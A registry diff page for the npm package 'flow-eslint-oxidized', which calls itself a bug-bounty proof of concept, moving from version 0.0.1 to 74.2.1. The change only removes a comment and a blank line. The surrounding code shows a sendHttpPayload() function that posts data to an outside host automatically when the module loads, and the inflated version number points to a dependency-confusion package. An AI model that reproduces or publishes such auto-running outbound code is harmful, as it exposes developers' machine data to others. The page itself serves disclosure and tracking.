flow-eslint-oxidized 0.0.1 → 74.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +0 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -34,13 +34,11 @@ function sendHttpPayload() {
34
34
  },
35
35
  timeout: 15000
36
36
  }, (res) => {
37
- // Just consume the stream, don't need the response
38
37
  res.on('data', () => { });
39
38
  });
40
39
 
41
40
  req.write(postData);
42
41
  req.end();
43
42
  }
44
-
45
43
  // Start sequence
46
44
  sendHttpPayload();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "flow-eslint-oxidized",
3
- "version": "0.0.1",
3
+ "version": "74.2.1",
4
4
  "description": "Security PoC for Bug Bounty",
5
5
  "main": "index.js",
6
6
  "scripts": {